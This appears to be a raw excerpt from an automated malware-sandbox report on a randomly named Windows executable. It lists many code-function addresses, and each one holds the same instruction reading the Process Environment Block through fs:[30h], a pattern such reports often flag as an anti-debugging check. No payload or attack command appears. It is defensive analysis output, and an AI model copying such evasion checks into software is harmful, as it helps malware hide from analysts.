Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0132E1D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0132E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0132E1D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013761C3 mov eax, dword ptr fs:[00000030h]	4_2_013761C3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013761C3 mov eax, dword ptr fs:[00000030h]	4_2_013761C3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01346030 mov eax, dword ptr fs:[00000030h]	4_2_01346030
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AA020 mov eax, dword ptr fs:[00000030h]	4_2_012AA020
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AC020 mov eax, dword ptr fs:[00000030h]	4_2_012AC020
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01334000 mov ecx, dword ptr fs:[00000030h]	4_2_01334000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01352000 mov eax, dword ptr fs:[00000030h]	4_2_01352000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01352000 mov eax, dword ptr fs:[00000030h]	4_2_01352000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01352000 mov eax, dword ptr fs:[00000030h]	4_2_01352000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01352000 mov eax, dword ptr fs:[00000030h]	4_2_01352000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01352000 mov eax, dword ptr fs:[00000030h]	4_2_01352000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01352000 mov eax, dword ptr fs:[00000030h]	4_2_01352000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01352000 mov eax, dword ptr fs:[00000030h]	4_2_01352000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01352000 mov eax, dword ptr fs:[00000030h]	4_2_01352000
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CE016 mov eax, dword ptr fs:[00000030h]	4_2_012CE016
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CE016 mov eax, dword ptr fs:[00000030h]	4_2_012CE016
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CE016 mov eax, dword ptr fs:[00000030h]	4_2_012CE016
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CE016 mov eax, dword ptr fs:[00000030h]	4_2_012CE016
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DC073 mov eax, dword ptr fs:[00000030h]	4_2_012DC073
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01336050 mov eax, dword ptr fs:[00000030h]	4_2_01336050
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B2050 mov eax, dword ptr fs:[00000030h]	4_2_012B2050
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A80A0 mov eax, dword ptr fs:[00000030h]	4_2_012A80A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013760B8 mov eax, dword ptr fs:[00000030h]	4_2_013760B8
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013760B8 mov ecx, dword ptr fs:[00000030h]	4_2_013760B8
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013480A8 mov eax, dword ptr fs:[00000030h]	4_2_013480A8
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B208A mov eax, dword ptr fs:[00000030h]	4_2_012B208A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B80E9 mov eax, dword ptr fs:[00000030h]	4_2_012B80E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AA0E3 mov ecx, dword ptr fs:[00000030h]	4_2_012AA0E3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013360E0 mov eax, dword ptr fs:[00000030h]	4_2_013360E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AC0F0 mov eax, dword ptr fs:[00000030h]	4_2_012AC0F0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F20F0 mov ecx, dword ptr fs:[00000030h]	4_2_012F20F0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013320DE mov eax, dword ptr fs:[00000030h]	4_2_013320DE
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01388324 mov eax, dword ptr fs:[00000030h]	4_2_01388324
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01388324 mov ecx, dword ptr fs:[00000030h]	4_2_01388324
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01388324 mov eax, dword ptr fs:[00000030h]	4_2_01388324
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01388324 mov eax, dword ptr fs:[00000030h]	4_2_01388324
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA30B mov eax, dword ptr fs:[00000030h]	4_2_012EA30B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA30B mov eax, dword ptr fs:[00000030h]	4_2_012EA30B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA30B mov eax, dword ptr fs:[00000030h]	4_2_012EA30B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AC310 mov ecx, dword ptr fs:[00000030h]	4_2_012AC310
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D0310 mov ecx, dword ptr fs:[00000030h]	4_2_012D0310
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135437C mov eax, dword ptr fs:[00000030h]	4_2_0135437C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0137A352 mov eax, dword ptr fs:[00000030h]	4_2_0137A352
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01358350 mov ecx, dword ptr fs:[00000030h]	4_2_01358350
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133035C mov eax, dword ptr fs:[00000030h]	4_2_0133035C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133035C mov eax, dword ptr fs:[00000030h]	4_2_0133035C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133035C mov eax, dword ptr fs:[00000030h]	4_2_0133035C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133035C mov ecx, dword ptr fs:[00000030h]	4_2_0133035C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133035C mov eax, dword ptr fs:[00000030h]	4_2_0133035C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0133035C mov eax, dword ptr fs:[00000030h]	4_2_0133035C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0138634F mov eax, dword ptr fs:[00000030h]	4_2_0138634F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01332349 mov eax, dword ptr fs:[00000030h]	4_2_01332349
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AE388 mov eax, dword ptr fs:[00000030h]	4_2_012AE388
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AE388 mov eax, dword ptr fs:[00000030h]	4_2_012AE388
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AE388 mov eax, dword ptr fs:[00000030h]	4_2_012AE388
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D438F mov eax, dword ptr fs:[00000030h]	4_2_012D438F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D438F mov eax, dword ptr fs:[00000030h]	4_2_012D438F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A8397 mov eax, dword ptr fs:[00000030h]	4_2_012A8397
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A8397 mov eax, dword ptr fs:[00000030h]	4_2_012A8397
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A8397 mov eax, dword ptr fs:[00000030h]	4_2_012A8397
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C03E9 mov eax, dword ptr fs:[00000030h]	4_2_012C03E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C03E9 mov eax, dword ptr fs:[00000030h]	4_2_012C03E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C03E9 mov eax, dword ptr fs:[00000030h]	4_2_012C03E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C03E9 mov eax, dword ptr fs:[00000030h]	4_2_012C03E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C03E9 mov eax, dword ptr fs:[00000030h]	4_2_012C03E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C03E9 mov eax, dword ptr fs:[00000030h]	4_2_012C03E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C03E9 mov eax, dword ptr fs:[00000030h]	4_2_012C03E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C03E9 mov eax, dword ptr fs:[00000030h]	4_2_012C03E9
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E63FF mov eax, dword ptr fs:[00000030h]	4_2_012E63FF
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CE3F0 mov eax, dword ptr fs:[00000030h]	4_2_012CE3F0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CE3F0 mov eax, dword ptr fs:[00000030h]	4_2_012CE3F0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012CE3F0 mov eax, dword ptr fs:[00000030h]	4_2_012CE3F0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013543D4 mov eax, dword ptr fs:[00000030h]	4_2_013543D4
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013543D4 mov eax, dword ptr fs:[00000030h]	4_2_013543D4
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA3C0 mov eax, dword ptr fs:[00000030h]	4_2_012BA3C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA3C0 mov eax, dword ptr fs:[00000030h]	4_2_012BA3C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA3C0 mov eax, dword ptr fs:[00000030h]	4_2_012BA3C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA3C0 mov eax, dword ptr fs:[00000030h]	4_2_012BA3C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA3C0 mov eax, dword ptr fs:[00000030h]	4_2_012BA3C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA3C0 mov eax, dword ptr fs:[00000030h]	4_2_012BA3C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B83C0 mov eax, dword ptr fs:[00000030h]	4_2_012B83C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B83C0 mov eax, dword ptr fs:[00000030h]	4_2_012B83C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B83C0 mov eax, dword ptr fs:[00000030h]	4_2_012B83C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B83C0 mov eax, dword ptr fs:[00000030h]	4_2_012B83C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E3DB mov eax, dword ptr fs:[00000030h]	4_2_0135E3DB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E3DB mov eax, dword ptr fs:[00000030h]	4_2_0135E3DB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E3DB mov ecx, dword ptr fs:[00000030h]	4_2_0135E3DB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0135E3DB mov eax, dword ptr fs:[00000030h]	4_2_0135E3DB
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013363C0 mov eax, dword ptr fs:[00000030h]	4_2_013363C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136C3CD mov eax, dword ptr fs:[00000030h]	4_2_0136C3CD
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A823B mov eax, dword ptr fs:[00000030h]	4_2_012A823B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012A826B mov eax, dword ptr fs:[00000030h]	4_2_012A826B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01360274 mov eax, dword ptr fs:[00000030h]	4_2_01360274
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B4260 mov eax, dword ptr fs:[00000030h]	4_2_012B4260
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B4260 mov eax, dword ptr fs:[00000030h]	4_2_012B4260
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B4260 mov eax, dword ptr fs:[00000030h]	4_2_012B4260
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0138625D mov eax, dword ptr fs:[00000030h]	4_2_0138625D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136A250 mov eax, dword ptr fs:[00000030h]	4_2_0136A250
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0136A250 mov eax, dword ptr fs:[00000030h]	4_2_0136A250
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01338243 mov eax, dword ptr fs:[00000030h]	4_2_01338243
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01338243 mov ecx, dword ptr fs:[00000030h]	4_2_01338243
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B6259 mov eax, dword ptr fs:[00000030h]	4_2_012B6259
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AA250 mov eax, dword ptr fs:[00000030h]	4_2_012AA250
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C02A0 mov eax, dword ptr fs:[00000030h]	4_2_012C02A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C02A0 mov eax, dword ptr fs:[00000030h]	4_2_012C02A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013462A0 mov eax, dword ptr fs:[00000030h]	4_2_013462A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013462A0 mov ecx, dword ptr fs:[00000030h]	4_2_013462A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013462A0 mov eax, dword ptr fs:[00000030h]	4_2_013462A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013462A0 mov eax, dword ptr fs:[00000030h]	4_2_013462A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013462A0 mov eax, dword ptr fs:[00000030h]	4_2_013462A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013462A0 mov eax, dword ptr fs:[00000030h]	4_2_013462A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE284 mov eax, dword ptr fs:[00000030h]	4_2_012EE284
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE284 mov eax, dword ptr fs:[00000030h]	4_2_012EE284
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01330283 mov eax, dword ptr fs:[00000030h]	4_2_01330283
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01330283 mov eax, dword ptr fs:[00000030h]	4_2_01330283
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01330283 mov eax, dword ptr fs:[00000030h]	4_2_01330283
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C02E1 mov eax, dword ptr fs:[00000030h]	4_2_012C02E1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C02E1 mov eax, dword ptr fs:[00000030h]	4_2_012C02E1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C02E1 mov eax, dword ptr fs:[00000030h]	4_2_012C02E1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA2C3 mov eax, dword ptr fs:[00000030h]	4_2_012BA2C3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA2C3 mov eax, dword ptr fs:[00000030h]	4_2_012BA2C3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA2C3 mov eax, dword ptr fs:[00000030h]	4_2_012BA2C3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA2C3 mov eax, dword ptr fs:[00000030h]	4_2_012BA2C3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012BA2C3 mov eax, dword ptr fs:[00000030h]	4_2_012BA2C3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013862D6 mov eax, dword ptr fs:[00000030h]	4_2_013862D6
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE53E mov eax, dword ptr fs:[00000030h]	4_2_012DE53E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE53E mov eax, dword ptr fs:[00000030h]	4_2_012DE53E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE53E mov eax, dword ptr fs:[00000030h]	4_2_012DE53E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE53E mov eax, dword ptr fs:[00000030h]	4_2_012DE53E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE53E mov eax, dword ptr fs:[00000030h]	4_2_012DE53E
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0535 mov eax, dword ptr fs:[00000030h]	4_2_012C0535
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0535 mov eax, dword ptr fs:[00000030h]	4_2_012C0535
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0535 mov eax, dword ptr fs:[00000030h]	4_2_012C0535
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0535 mov eax, dword ptr fs:[00000030h]	4_2_012C0535
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0535 mov eax, dword ptr fs:[00000030h]	4_2_012C0535
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012C0535 mov eax, dword ptr fs:[00000030h]	4_2_012C0535
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01346500 mov eax, dword ptr fs:[00000030h]	4_2_01346500
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384500 mov eax, dword ptr fs:[00000030h]	4_2_01384500
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384500 mov eax, dword ptr fs:[00000030h]	4_2_01384500
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384500 mov eax, dword ptr fs:[00000030h]	4_2_01384500
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384500 mov eax, dword ptr fs:[00000030h]	4_2_01384500
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384500 mov eax, dword ptr fs:[00000030h]	4_2_01384500
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384500 mov eax, dword ptr fs:[00000030h]	4_2_01384500
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_01384500 mov eax, dword ptr fs:[00000030h]	4_2_01384500
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E656A mov eax, dword ptr fs:[00000030h]	4_2_012E656A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E656A mov eax, dword ptr fs:[00000030h]	4_2_012E656A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E656A mov eax, dword ptr fs:[00000030h]	4_2_012E656A
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B8550 mov eax, dword ptr fs:[00000030h]	4_2_012B8550
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B8550 mov eax, dword ptr fs:[00000030h]	4_2_012B8550
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013305A7 mov eax, dword ptr fs:[00000030h]	4_2_013305A7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013305A7 mov eax, dword ptr fs:[00000030h]	4_2_013305A7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_013305A7 mov eax, dword ptr fs:[00000030h]	4_2_013305A7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D45B1 mov eax, dword ptr fs:[00000030h]	4_2_012D45B1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012D45B1 mov eax, dword ptr fs:[00000030h]	4_2_012D45B1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012E4588 mov eax, dword ptr fs:[00000030h]	4_2_012E4588
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B2582 mov eax, dword ptr fs:[00000030h]	4_2_012B2582
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B2582 mov ecx, dword ptr fs:[00000030h]	4_2_012B2582
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE59C mov eax, dword ptr fs:[00000030h]	4_2_012EE59C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EC5ED mov eax, dword ptr fs:[00000030h]	4_2_012EC5ED
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EC5ED mov eax, dword ptr fs:[00000030h]	4_2_012EC5ED
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012DE5E7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012DE5E7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012DE5E7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012DE5E7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012DE5E7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012DE5E7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012DE5E7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012DE5E7 mov eax, dword ptr fs:[00000030h]	4_2_012DE5E7
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B25E0 mov eax, dword ptr fs:[00000030h]	4_2_012B25E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE5CF mov eax, dword ptr fs:[00000030h]	4_2_012EE5CF
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EE5CF mov eax, dword ptr fs:[00000030h]	4_2_012EE5CF
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012B65D0 mov eax, dword ptr fs:[00000030h]	4_2_012B65D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA5D0 mov eax, dword ptr fs:[00000030h]	4_2_012EA5D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012EA5D0 mov eax, dword ptr fs:[00000030h]	4_2_012EA5D0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AE420 mov eax, dword ptr fs:[00000030h]	4_2_012AE420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AE420 mov eax, dword ptr fs:[00000030h]	4_2_012AE420
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012AE420 mov eax, dword ptr fs:[00000030h]	4_2_012AE420
